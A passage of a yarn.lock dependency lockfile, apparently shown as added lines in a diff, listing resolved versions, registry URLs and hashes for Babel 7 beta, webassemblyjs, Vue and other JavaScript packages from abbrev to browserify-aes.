"@babel/plugin-transform-block-scoped-functions" "7.0.0-beta.47" + "@babel/plugin-transform-block-scoping" "7.0.0-beta.47" + "@babel/plugin-transform-classes" "7.0.0-beta.47" + "@babel/plugin-transform-computed-properties" "7.0.0-beta.47" + "@babel/plugin-transform-destructuring" "7.0.0-beta.47" + "@babel/plugin-transform-dotall-regex" "7.0.0-beta.47" + "@babel/plugin-transform-duplicate-keys" "7.0.0-beta.47" + "@babel/plugin-transform-exponentiation-operator" "7.0.0-beta.47" + "@babel/plugin-transform-for-of" "7.0.0-beta.47" + "@babel/plugin-transform-function-name" "7.0.0-beta.47" + "@babel/plugin-transform-literals" "7.0.0-beta.47" + "@babel/plugin-transform-modules-amd" "7.0.0-beta.47" + "@babel/plugin-transform-modules-commonjs" "7.0.0-beta.47" + "@babel/plugin-transform-modules-systemjs" "7.0.0-beta.47" + "@babel/plugin-transform-modules-umd" "7.0.0-beta.47" + "@babel/plugin-transform-new-target" "7.0.0-beta.47" + "@babel/plugin-transform-object-super" "7.0.0-beta.47" + "@babel/plugin-transform-parameters" "7.0.0-beta.47" + "@babel/plugin-transform-regenerator" "7.0.0-beta.47" + "@babel/plugin-transform-shorthand-properties" "7.0.0-beta.47" + "@babel/plugin-transform-spread" "7.0.0-beta.47" + "@babel/plugin-transform-sticky-regex" "7.0.0-beta.47" + "@babel/plugin-transform-template-literals" "7.0.0-beta.47" + "@babel/plugin-transform-typeof-symbol" "7.0.0-beta.47" + "@babel/plugin-transform-unicode-regex" "7.0.0-beta.47" + browserslist "^3.0.0" + invariant "^2.2.2" + semver "^5.3.0" + +"@babel/preset-stage-2@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/preset-stage-2/-/preset-stage-2-7.0.0-beta.47.tgz#deb930c44d7d6e519a33174bba121a2a630ed654" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/plugin-proposal-decorators" "7.0.0-beta.47" + "@babel/plugin-proposal-export-namespace-from" "7.0.0-beta.47" + "@babel/plugin-proposal-function-sent" "7.0.0-beta.47" + "@babel/plugin-proposal-numeric-separator" "7.0.0-beta.47" + "@babel/plugin-proposal-throw-expressions" "7.0.0-beta.47" + "@babel/preset-stage-3" "7.0.0-beta.47" + +"@babel/preset-stage-3@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/preset-stage-3/-/preset-stage-3-7.0.0-beta.47.tgz#17028f3b5dddc548d80404c86ed62622f601597b" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/plugin-proposal-async-generator-functions" "7.0.0-beta.47" + "@babel/plugin-proposal-class-properties" "7.0.0-beta.47" + "@babel/plugin-proposal-object-rest-spread" "7.0.0-beta.47" + "@babel/plugin-proposal-optional-catch-binding" "7.0.0-beta.47" + "@babel/plugin-proposal-unicode-property-regex" "7.0.0-beta.47" + "@babel/plugin-syntax-dynamic-import" "7.0.0-beta.47" + "@babel/plugin-syntax-import-meta" "7.0.0-beta.47" + +"@babel/runtime@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/runtime/-/runtime-7.0.0-beta.47.tgz#273f5e71629e80f6cbcd7507503848615e59f7e0" + dependencies: + core-js "^2.5.3" + regenerator-runtime "^0.11.1" + +"@babel/template@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/template/-/template-7.0.0-beta.47.tgz#0473970a7c0bee7a1a18c1ca999d3ba5e5bad83d" + dependencies: + "@babel/code-frame" "7.0.0-beta.47" + "@babel/types" "7.0.0-beta.47" + babylon "7.0.0-beta.47" + lodash "^4.17.5" + +"@babel/traverse@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/traverse/-/traverse-7.0.0-beta.47.tgz#0e57fdbb9ff3a909188b6ebf1e529c641e6c82a4" + dependencies: + "@babel/code-frame" "7.0.0-beta.47" + "@babel/generator" "7.0.0-beta.47" + "@babel/helper-function-name" "7.0.0-beta.47" + "@babel/helper-split-export-declaration" "7.0.0-beta.47" + "@babel/types" "7.0.0-beta.47" + babylon "7.0.0-beta.47" + debug "^3.1.0" + globals "^11.1.0" + invariant "^2.2.0" + lodash "^4.17.5" + +"@babel/types@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/types/-/types-7.0.0-beta.47.tgz#e6fcc1a691459002c2671d558a586706dddaeef8" + dependencies: + esutils "^2.0.2" + lodash "^4.17.5" + to-fast-properties "^2.0.0" + +"@mrmlnc/readdir-enhanced@^2.2.1": + version "2.2.1" + resolved "https://registry.yarnpkg.com/@mrmlnc/readdir-enhanced/-/readdir-enhanced-2.2.1.tgz#524af240d1a360527b730475ecfa1344aa540dde" + dependencies: + call-me-maybe "^1.0.1" + glob-to-regexp "^0.3.0" + +"@nodelib/fs.stat@^1.0.1": + version "1.1.0" + resolved "https://registry.yarnpkg.com/@nodelib/fs.stat/-/fs.stat-1.1.0.tgz#50c1e2260ac0ed9439a181de3725a0168d59c48a" + +"@shellscape/koa-send@^4.1.0": + version "4.1.3" + resolved "https://registry.yarnpkg.com/@shellscape/koa-send/-/koa-send-4.1.3.tgz#1a7c8df21f63487e060b7bfd8ed82e1d3c4ae0b0" + dependencies: + debug "^2.6.3" + http-errors "^1.6.1" + mz "^2.6.0" + resolve-path "^1.3.3" + +"@shellscape/koa-static@^4.0.4": + version "4.0.5" + resolved "https://registry.yarnpkg.com/@shellscape/koa-static/-/koa-static-4.0.5.tgz#b329b55bfd41056a6981c584ae6bace30b5b6b3b" + dependencies: + "@shellscape/koa-send" "^4.1.0" + debug "^2.6.8" + +"@vue/babel-preset-app@3.0.0-beta.11": + version "3.0.0-beta.11" + resolved "https://registry.yarnpkg.com/@vue/babel-preset-app/-/babel-preset-app-3.0.0-beta.11.tgz#c8b889aa73464050f9cd3f9dc621951d85c24508" + dependencies: + "@babel/plugin-syntax-jsx" "7.0.0-beta.47" + "@babel/plugin-transform-runtime" "7.0.0-beta.47" + "@babel/preset-env" "7.0.0-beta.47" + "@babel/preset-stage-2" "7.0.0-beta.47" + "@babel/runtime" "7.0.0-beta.47" + babel-helper-vue-jsx-merge-props "^2.0.3" + babel-plugin-dynamic-import-node "^1.2.0" + babel-plugin-transform-vue-jsx "^4.0.1" + +"@vue/component-compiler-utils@^1.2.1": + version "1.3.1" + resolved "https://registry.yarnpkg.com/@vue/component-compiler-utils/-/component-compiler-utils-1.3.1.tgz#686f0b913d59590ae327b2a1cb4b6d9b931bbe0e" + dependencies: + consolidate "^0.15.1" + hash-sum "^1.0.2" + lru-cache "^4.1.2" + merge-source-map "^1.1.0" + postcss "^6.0.20" + postcss-selector-parser "^3.1.1" + prettier "^1.13.0" + source-map "^0.5.6" + vue-template-es2015-compiler "^1.6.0" + +"@webassemblyjs/ast@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/ast/-/ast-1.5.12.tgz#a9acbcb3f25333c4edfa1fdf3186b1ccf64e6664" + dependencies: + "@webassemblyjs/helper-module-context" "1.5.12" + "@webassemblyjs/helper-wasm-bytecode" "1.5.12" + "@webassemblyjs/wast-parser" "1.5.12" + debug "^3.1.0" + mamacro "^0.0.3" + +"@webassemblyjs/floating-point-hex-parser@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/floating-point-hex-parser/-/floating-point-hex-parser-1.5.12.tgz#0f36044ffe9652468ce7ae5a08716a4eeff9cd9c" + +"@webassemblyjs/helper-api-error@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/helper-api-error/-/helper-api-error-1.5.12.tgz#05466833ff2f9d8953a1a327746e1d112ea62aaf" + +"@webassemblyjs/helper-buffer@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/helper-buffer/-/helper-buffer-1.5.12.tgz#1f0de5aaabefef89aec314f7f970009cd159c73d" + dependencies: + debug "^3.1.0" + +"@webassemblyjs/helper-code-frame@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/helper-code-frame/-/helper-code-frame-1.5.12.tgz#3cdc1953093760d1c0f0caf745ccd62bdb6627c7" + dependencies: + "@webassemblyjs/wast-printer" "1.5.12" + +"@webassemblyjs/helper-fsm@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/helper-fsm/-/helper-fsm-1.5.12.tgz#6bc1442b037f8e30f2e57b987cee5c806dd15027" + +"@webassemblyjs/helper-module-context@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/helper-module-context/-/helper-module-context-1.5.12.tgz#b5588ca78b33b8a0da75f9ab8c769a3707baa861" + dependencies: + debug "^3.1.0" + mamacro "^0.0.3" + +"@webassemblyjs/helper-wasm-bytecode@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/helper-wasm-bytecode/-/helper-wasm-bytecode-1.5.12.tgz#d12a3859db882a448891a866a05d0be63785b616" + +"@webassemblyjs/helper-wasm-section@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/helper-wasm-section/-/helper-wasm-section-1.5.12.tgz#ff9fe1507d368ad437e7969d25e8c1693dac1884" + dependencies: + "@webassemblyjs/ast" "1.5.12" + "@webassemblyjs/helper-buffer" "1.5.12" + "@webassemblyjs/helper-wasm-bytecode" "1.5.12" + "@webassemblyjs/wasm-gen" "1.5.12" + debug "^3.1.0" + +"@webassemblyjs/ieee754@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/ieee754/-/ieee754-1.5.12.tgz#ee9574bc558888f13097ce3e7900dff234ea19a4" + dependencies: + ieee754 "^1.1.11" + +"@webassemblyjs/leb128@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/leb128/-/leb128-1.5.12.tgz#0308eec652765ee567d8a5fa108b4f0b25b458e1" + dependencies: + leb "^0.3.0" + +"@webassemblyjs/utf8@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/utf8/-/utf8-1.5.12.tgz#d5916222ef314bf60d6806ed5ac045989bfd92ce" + +"@webassemblyjs/wasm-edit@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/wasm-edit/-/wasm-edit-1.5.12.tgz#821c9358e644a166f2c910e5af1b46ce795a17aa" + dependencies: + "@webassemblyjs/ast" "1.5.12" + "@webassemblyjs/helper-buffer" "1.5.12" + "@webassemblyjs/helper-wasm-bytecode" "1.5.12" + "@webassemblyjs/helper-wasm-section" "1.5.12" + "@webassemblyjs/wasm-gen" "1.5.12" + "@webassemblyjs/wasm-opt" "1.5.12" + "@webassemblyjs/wasm-parser" "1.5.12" + "@webassemblyjs/wast-printer" "1.5.12" + debug "^3.1.0" + +"@webassemblyjs/wasm-gen@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/wasm-gen/-/wasm-gen-1.5.12.tgz#0b7ccfdb93dab902cc0251014e2e18bae3139bcb" + dependencies: + "@webassemblyjs/ast" "1.5.12" + "@webassemblyjs/helper-wasm-bytecode" "1.5.12" + "@webassemblyjs/ieee754" "1.5.12" + "@webassemblyjs/leb128" "1.5.12" + "@webassemblyjs/utf8" "1.5.12" + +"@webassemblyjs/wasm-opt@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/wasm-opt/-/wasm-opt-1.5.12.tgz#bd758a8bc670f585ff1ae85f84095a9e0229cbc9" + dependencies: + "@webassemblyjs/ast" "1.5.12" + "@webassemblyjs/helper-buffer" "1.5.12" + "@webassemblyjs/wasm-gen" "1.5.12" + "@webassemblyjs/wasm-parser" "1.5.12" + debug "^3.1.0" + +"@webassemblyjs/wasm-parser@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/wasm-parser/-/wasm-parser-1.5.12.tgz#7b10b4388ecf98bd7a22e702aa62ec2f46d0c75e" + dependencies: + "@webassemblyjs/ast" "1.5.12" + "@webassemblyjs/helper-api-error" "1.5.12" + "@webassemblyjs/helper-wasm-bytecode" "1.5.12" + "@webassemblyjs/ieee754" "1.5.12" + "@webassemblyjs/leb128" "1.5.12" + "@webassemblyjs/utf8" "1.5.12" + +"@webassemblyjs/wast-parser@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/wast-parser/-/wast-parser-1.5.12.tgz#9cf5ae600ecae0640437b5d4de5dd6b6088d0d8b" + dependencies: + "@webassemblyjs/ast" "1.5.12" + "@webassemblyjs/floating-point-hex-parser" "1.5.12" + "@webassemblyjs/helper-api-error" "1.5.12" + "@webassemblyjs/helper-code-frame" "1.5.12" + "@webassemblyjs/helper-fsm" "1.5.12" + long "^3.2.0" + mamacro "^0.0.3" + +"@webassemblyjs/wast-printer@1.5.12": + version "1.5.12" + resolved "https://registry.yarnpkg.com/@webassemblyjs/wast-printer/-/wast-printer-1.5.12.tgz#563ca4d01b22d21640b2463dc5e3d7f7d9dac520" + dependencies: + "@webassemblyjs/ast" "1.5.12" + "@webassemblyjs/wast-parser" "1.5.12" + long "^3.2.0" + +"@webpack-contrib/config-loader@^1.1.1": + version "1.1.3" + resolved "https://registry.yarnpkg.com/@webpack-contrib/config-loader/-/config-loader-1.1.3.tgz#6cce904cabfd880203db600207fdbf64f4744fd7" + dependencies: + "@webpack-contrib/schema-utils" "^1.0.0-beta.0" + chalk "^2.1.0" + cosmiconfig "^5.0.2" + loud-rejection "^1.6.0" + merge-options "^1.0.1" + minimist "^1.2.0" + resolve "^1.6.0" + webpack-log "^1.1.2" + +"@webpack-contrib/schema-utils@^1.0.0-beta.0": + version "1.0.0-beta.0" + resolved "https://registry.yarnpkg.com/@webpack-contrib/schema-utils/-/schema-utils-1.0.0-beta.0.tgz#bf9638c9464d177b48209e84209e23bee2eb4f65" + dependencies: + ajv "^6.1.0" + ajv-keywords "^3.1.0" + chalk "^2.3.2" + strip-ansi "^4.0.0" + text-table "^0.2.0" + webpack-log "^1.1.2" + +abbrev@1: + version "1.1.1" + resolved "https://registry.yarnpkg.com/abbrev/-/abbrev-1.1.1.tgz#f8f2c887ad10bf67f634f005b6987fed3179aac8" + +accepts@^1.2.2: + version "1.3.5" + resolved "https://registry.yarnpkg.com/accepts/-/accepts-1.3.5.tgz#eb777df6011723a3b14e8a72c0805c8e86746bd2" + dependencies: + mime-types "~2.1.18" + negotiator "0.6.1" + +acorn-dynamic-import@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/acorn-dynamic-import/-/acorn-dynamic-import-3.0.0.tgz#901ceee4c7faaef7e07ad2a47e890675da50a278" + dependencies: + acorn "^5.0.0" + +acorn@^5.0.0, acorn@^5.6.2: + version "5.7.1" + resolved "https://registry.yarnpkg.com/acorn/-/acorn-5.7.1.tgz#f095829297706a7c9776958c0afc8930a9b9d9d8" + +agentkeepalive@^2.2.0: + version "2.2.0" + resolved "https://registry.yarnpkg.com/agentkeepalive/-/agentkeepalive-2.2.0.tgz#c5d1bd4b129008f1163f236f86e5faea2026e2ef" + +ajv-keywords@^3.0.0, ajv-keywords@^3.1.0: + version "3.2.0" + resolved "https://registry.yarnpkg.com/ajv-keywords/-/ajv-keywords-3.2.0.tgz#e86b819c602cf8821ad637413698f1dec021847a" + +ajv@^6.0.1, ajv@^6.1.0: + version "6.5.1" + resolved "https://registry.yarnpkg.com/ajv/-/ajv-6.5.1.tgz#88ebc1263c7133937d108b80c5572e64e1d9322d" + dependencies: + fast-deep-equal "^2.0.1" + fast-json-stable-stringify "^2.0.0" + json-schema-traverse "^0.4.1" + uri-js "^4.2.1" + +algoliasearch@^3.24.5: + version "3.29.0" + resolved "https://registry.yarnpkg.com/algoliasearch/-/algoliasearch-3.29.0.tgz#d04021a5450be55ce314b928bba4a38723399bd8" + dependencies: + agentkeepalive "^2.2.0" + debug "^2.6.8" + envify "^4.0.0" + es6-promise "^4.1.0" + events "^1.1.0" + foreach "^2.0.5" + global "^4.3.2" + inherits "^2.0.1" + isarray "^2.0.1" + load-script "^1.0.0" + object-keys "^1.0.11" + querystring-es3 "^0.2.1" + reduce "^1.0.1" + semver "^5.1.0" + tunnel-agent "^0.6.0" + +alphanum-sort@^1.0.1, alphanum-sort@^1.0.2: + version "1.0.2" + resolved "https://registry.yarnpkg.com/alphanum-sort/-/alphanum-sort-1.0.2.tgz#97a1119649b211ad33691d9f9f486a8ec9fbe0a3" + +amdefine@>=0.0.4: + version "1.0.1" + resolved "https://registry.yarnpkg.com/amdefine/-/amdefine-1.0.1.tgz#4a5282ac164729e93619bcfd3ad151f817ce91f5" + +ansi-align@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/ansi-align/-/ansi-align-2.0.0.tgz#c36aeccba563b89ceb556f3690f0b1d9e3547f7f" + dependencies: + string-width "^2.0.0" + +ansi-escapes@^3.0.0: + version "3.1.0" + resolved "https://registry.yarnpkg.com/ansi-escapes/-/ansi-escapes-3.1.0.tgz#f73207bb81207d75fd6c83f125af26eea378ca30" + +ansi-regex@^2.0.0: + version "2.1.1" + resolved "https://registry.yarnpkg.com/ansi-regex/-/ansi-regex-2.1.1.tgz#c3b33ab5ee360d86e0e628f0468ae7ef27d654df" + +ansi-regex@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/ansi-regex/-/ansi-regex-3.0.0.tgz#ed0317c322064f79466c02966bddb605ab37d998" + +ansi-styles@^2.2.1: + version "2.2.1" + resolved "https://registry.yarnpkg.com/ansi-styles/-/ansi-styles-2.2.1.tgz#b432dd3358b634cf75e1e4664368240533c1ddbe" + +ansi-styles@^3.2.1: + version "3.2.1" + resolved "https://registry.yarnpkg.com/ansi-styles/-/ansi-styles-3.2.1.tgz#41fbb20243e50b12be0f04b8dedbf07520ce841d" + dependencies: + color-convert "^1.9.0" + +any-promise@^1.0.0, any-promise@^1.1.0: + version "1.3.0" + resolved "https://registry.yarnpkg.com/any-promise/-/any-promise-1.3.0.tgz#abc6afeedcea52e809cdc0376aed3ce39635d17f" + +anymatch@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/anymatch/-/anymatch-2.0.0.tgz#bcb24b4f37934d9aa7ac17b4adaf89e7c76ef2eb" + dependencies: + micromatch "^3.1.4" + normalize-path "^2.1.1" + +app-root-path@^2.0.1: + version "2.0.1" + resolved "https://registry.yarnpkg.com/app-root-path/-/app-root-path-2.0.1.tgz#cd62dcf8e4fd5a417efc664d2e5b10653c651b46" + +aproba@^1.0.3, aproba@^1.1.1: + version "1.2.0" + resolved "https://registry.yarnpkg.com/aproba/-/aproba-1.2.0.tgz#6802e6264efd18c790a1b0d517f0f2627bf2c94a" + +arch@^2.1.0: + version "2.1.1" + resolved "https://registry.yarnpkg.com/arch/-/arch-2.1.1.tgz#8f5c2731aa35a30929221bb0640eed65175ec84e" + +are-we-there-yet@~1.1.2: + version "1.1.5" + resolved "https://registry.yarnpkg.com/are-we-there-yet/-/are-we-there-yet-1.1.5.tgz#4b35c2944f062a8bfcda66410760350fe9ddfc21" + dependencies: + delegates "^1.0.0" + readable-stream "^2.0.6" + +argparse@^1.0.7: + version "1.0.10" + resolved "https://registry.yarnpkg.com/argparse/-/argparse-1.0.10.tgz#bcd6791ea5ae09725e17e5ad988134cd40b3d911" + dependencies: + sprintf-js "~1.0.2" + +arr-diff@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/arr-diff/-/arr-diff-2.0.0.tgz#8f3b827f955a8bd669697e4a4256ac3ceae356cf" + dependencies: + arr-flatten "^1.0.1" + +arr-diff@^4.0.0: + version "4.0.0" + resolved "https://registry.yarnpkg.com/arr-diff/-/arr-diff-4.0.0.tgz#d6461074febfec71e7e15235761a329a5dc7c520" + +arr-flatten@^1.0.1, arr-flatten@^1.1.0: + version "1.1.0" + resolved "https://registry.yarnpkg.com/arr-flatten/-/arr-flatten-1.1.0.tgz#36048bbff4e7b47e136644316c99669ea5ae91f1" + +arr-union@^3.1.0: + version "3.1.0" + resolved "https://registry.yarnpkg.com/arr-union/-/arr-union-3.1.0.tgz#e39b09aea9def866a8f206e288af63919bae39c4" + +array-find-index@^1.0.1: + version "1.0.2" + resolved "https://registry.yarnpkg.com/array-find-index/-/array-find-index-1.0.2.tgz#df010aa1287e164bbda6f9723b0a96a1ec4187a1" + +array-union@^1.0.1: + version "1.0.2" + resolved "https://registry.yarnpkg.com/array-union/-/array-union-1.0.2.tgz#9a34410e4f4e3da23dea375be5be70f24778ec39" + dependencies: + array-uniq "^1.0.1" + +array-uniq@^1.0.1: + version "1.0.3" + resolved "https://registry.yarnpkg.com/array-uniq/-/array-uniq-1.0.3.tgz#af6ac877a25cc7f74e058894753858dfdb24fdb6" + +array-unique@^0.2.1: + version "0.2.1" + resolved "https://registry.yarnpkg.com/array-unique/-/array-unique-0.2.1.tgz#a1d97ccafcbc2625cc70fadceb36a50c58b01a53" + +array-unique@^0.3.2: + version "0.3.2" + resolved "https://registry.yarnpkg.com/array-unique/-/array-unique-0.3.2.tgz#a894b75d4bc4f6cd679ef3244a9fd8f46ae2d428" + +arrify@^1.0.1: + version "1.0.1" + resolved "https://registry.yarnpkg.com/arrify/-/arrify-1.0.1.tgz#898508da2226f380df904728456849c1501a4b0d" + +asn1.js@^4.0.0: + version "4.10.1" + resolved "https://registry.yarnpkg.com/asn1.js/-/asn1.js-4.10.1.tgz#b9c2bf5805f1e64aadeed6df3a2bfafb5a73f5a0" + dependencies: + bn.js "^4.0.0" + inherits "^2.0.1" + minimalistic-assert "^1.0.0" + +assert@^1.1.1: + version "1.4.1" + resolved "https://registry.yarnpkg.com/assert/-/assert-1.4.1.tgz#99912d591836b5a6f5b345c0f07eefc08fc65d91" + dependencies: + util "0.10.3" + +assign-symbols@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/assign-symbols/-/assign-symbols-1.0.0.tgz#59667f41fadd4f20ccbc2bb96b8d4f7f78ec0367" + +async-each@^1.0.0: + version "1.0.1" + resolved "https://registry.yarnpkg.com/async-each/-/async-each-1.0.1.tgz#19d386a1d9edc6e7c1c85d388aedbcc56d33602d" + +async-limiter@~1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/async-limiter/-/async-limiter-1.0.0.tgz#78faed8c3d074ab81f22b4e985d79e8738f720f8" + +async@^1.5.2: + version "1.5.2" + resolved "https://registry.yarnpkg.com/async/-/async-1.5.2.tgz#ec6a61ae56480c0c3cb241c95618e20892f9672a" + +atob@^2.1.1: + version "2.1.1" + resolved "https://registry.yarnpkg.com/atob/-/atob-2.1.1.tgz#ae2d5a729477f289d60dd7f96a6314a22dd6c22a" + +autocomplete.js@^0.29.0: + version "0.29.0" + resolved "https://registry.yarnpkg.com/autocomplete.js/-/autocomplete.js-0.29.0.tgz#0185f7375ee9daf068f7d52d794bc90dcd739fd7" + dependencies: + immediate "^3.2.3" + +autoprefixer@^6.3.1: + version "6.7.7" + resolved "https://registry.yarnpkg.com/autoprefixer/-/autoprefixer-6.7.7.tgz#1dbd1c835658e35ce3f9984099db00585c782014" + dependencies: + browserslist "^1.7.6" + caniuse-db "^1.0.30000634" + normalize-range "^0.1.2" + num2fraction "^1.2.2" + postcss "^5.2.16" + postcss-value-parser "^3.2.3" + +autoprefixer@^8.2.0: + version "8.6.3" + resolved "https://registry.yarnpkg.com/autoprefixer/-/autoprefixer-8.6.3.tgz#1d38a129e6a4582a565b6570d16f2d7d3de9cbf9" + dependencies: + browserslist "^3.2.8" + caniuse-lite "^1.0.30000856" + normalize-range "^0.1.2" + num2fraction "^1.2.2" + postcss "^6.0.22" + postcss-value-parser "^3.2.3" + +babel-code-frame@^6.26.0: + version "6.26.0" + resolved "https://registry.yarnpkg.com/babel-code-frame/-/babel-code-frame-6.26.0.tgz#63fd43f7dc1e3bb7ce35947db8fe369a3f58c74b" + dependencies: + chalk "^1.1.3" + esutils "^2.0.2" + js-tokens "^3.0.2" + +babel-helper-vue-jsx-merge-props@^2.0.3: + version "2.0.3" + resolved "https://registry.yarnpkg.com/babel-helper-vue-jsx-merge-props/-/babel-helper-vue-jsx-merge-props-2.0.3.tgz#22aebd3b33902328e513293a8e4992b384f9f1b6" + +babel-loader@8.0.0-beta.3: + version "8.0.0-beta.3" + resolved "https://registry.yarnpkg.com/babel-loader/-/babel-loader-8.0.0-beta.3.tgz#49efeea6e8058d5af860a18a6de88b8c1450645b" + dependencies: + find-cache-dir "^1.0.0" + loader-utils "^1.0.2" + mkdirp "^0.5.1" + util.promisify "^1.0.0" + +babel-plugin-dynamic-import-node@^1.2.0: + version "1.2.0" + resolved "https://registry.yarnpkg.com/babel-plugin-dynamic-import-node/-/babel-plugin-dynamic-import-node-1.2.0.tgz#f91631e703e0595e47d4beafbb088576c87fbeee" + dependencies: + babel-plugin-syntax-dynamic-import "^6.18.0" + +babel-plugin-syntax-dynamic-import@^6.18.0: + version "6.18.0" + resolved "https://registry.yarnpkg.com/babel-plugin-syntax-dynamic-import/-/babel-plugin-syntax-dynamic-import-6.18.0.tgz#8d6a26229c83745a9982a441051572caa179b1da" + +babel-plugin-transform-vue-jsx@^4.0.1: + version "4.0.1" + resolved "https://registry.yarnpkg.com/babel-plugin-transform-vue-jsx/-/babel-plugin-transform-vue-jsx-4.0.1.tgz#2c8bddce87a6ef09eaa59869ff1bfbeeafc5f88d" + dependencies: + esutils "^2.0.2" + +babel-runtime@^6.26.0: + version "6.26.0" + resolved "https://registry.yarnpkg.com/babel-runtime/-/babel-runtime-6.26.0.tgz#965c7058668e82b55d7bfe04ff2337bc8b5647fe" + dependencies: + core-js "^2.4.0" + regenerator-runtime "^0.11.0" + +babylon@7.0.0-beta.47: + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/babylon/-/babylon-7.0.0-beta.47.tgz#6d1fa44f0abec41ab7c780481e62fd9aafbdea80" + +balanced-match@^0.4.2: + version "0.4.2" + resolved "https://registry.yarnpkg.com/balanced-match/-/balanced-match-0.4.2.tgz#cb3f3e3c732dc0f01ee70b403f302e61d7709838" + +balanced-match@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/balanced-match/-/balanced-match-1.0.0.tgz#89b4d199ab2bee49de164ea02b89ce462d71b767" + +base64-js@^1.0.2: + version "1.3.0" + resolved "https://registry.yarnpkg.com/base64-js/-/base64-js-1.3.0.tgz#cab1e6118f051095e58b5281aea8c1cd22bfc0e3" + +base@^0.11.1: + version "0.11.2" + resolved "https://registry.yarnpkg.com/base/-/base-0.11.2.tgz#7bde5ced145b6d551a90db87f83c558b4eb48a8f" + dependencies: + cache-base "^1.0.1" + class-utils "^0.3.5" + component-emitter "^1.2.1" + define-property "^1.0.0" + isobject "^3.0.1" + mixin-deep "^1.2.0" + pascalcase "^0.1.1" + +big.js@^3.1.3: + version "3.2.0" + resolved "https://registry.yarnpkg.com/big.js/-/big.js-3.2.0.tgz#a5fc298b81b9e0dca2e458824784b65c52ba588e" + +binary-extensions@^1.0.0: + version "1.11.0" + resolved "https://registry.yarnpkg.com/binary-extensions/-/binary-extensions-1.11.0.tgz#46aa1751fb6a2f93ee5e689bb1087d4b14c6c205" + +bluebird@^3.1.1, bluebird@^3.5.1: + version "3.5.1" + resolved "https://registry.yarnpkg.com/bluebird/-/bluebird-3.5.1.tgz#d9551f9de98f1fcda1e683d17ee91a0602ee2eb9" + +bn.js@^4.0.0, bn.js@^4.1.0, bn.js@^4.1.1, bn.js@^4.4.0: + version "4.11.8" + resolved "https://registry.yarnpkg.com/bn.js/-/bn.js-4.11.8.tgz#2cde09eb5ee341f484746bb0309b3253b1b1442f" + +boolbase@~1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/boolbase/-/boolbase-1.0.0.tgz#68dff5fbe60c51eb37725ea9e3ed310dcc1e776e" + +boxen@^1.2.1: + version "1.3.0" + resolved "https://registry.yarnpkg.com/boxen/-/boxen-1.3.0.tgz#55c6c39a8ba58d9c61ad22cd877532deb665a20b" + dependencies: + ansi-align "^2.0.0" + camelcase "^4.0.0" + chalk "^2.0.1" + cli-boxes "^1.0.0" + string-width "^2.0.0" + term-size "^1.2.0" + widest-line "^2.0.0" + +brace-expansion@^1.1.7: + version "1.1.11" + resolved "https://registry.yarnpkg.com/brace-expansion/-/brace-expansion-1.1.11.tgz#3c7fcbf529d87226f3d2f52b966ff5271eb441dd" + dependencies: + balanced-match "^1.0.0" + concat-map "0.0.1" + +braces@^1.8.2: + version "1.8.5" + resolved "https://registry.yarnpkg.com/braces/-/braces-1.8.5.tgz#ba77962e12dff969d6b76711e914b737857bf6a7" + dependencies: + expand-range "^1.8.1" + preserve "^0.2.0" + repeat-element "^1.1.2" + +braces@^2.3.0, braces@^2.3.1: + version "2.3.2" + resolved "https://registry.yarnpkg.com/braces/-/braces-2.3.2.tgz#5979fd3f14cd531565e5fa2df1abfff1dfaee729" + dependencies: + arr-flatten "^1.1.0" + array-unique "^0.3.2" + extend-shallow "^2.0.1" + fill-range "^4.0.0" + isobject "^3.0.1" + repeat-element "^1.1.2" + snapdragon "^0.8.1" + snapdragon-node "^2.0.1" + split-string "^3.0.2" + to-regex "^3.0.1" + +brorand@^1.0.1: + version "1.1.0" + resolved "https://registry.yarnpkg.com/brorand/-/brorand-1.1.0.tgz#12c25efe40a45e3c323eb8675a0a0ce57b22371f" + +browserify-aes@^1.0.0, browserify-aes@^1.0.4: + version "1.2.0" + resolved "https://registry.yarnpkg.com/browserify-aes/-/browserify-aes-1.2.0.tgz#326734642f403dabc3003209853bb70ad428ef48" + 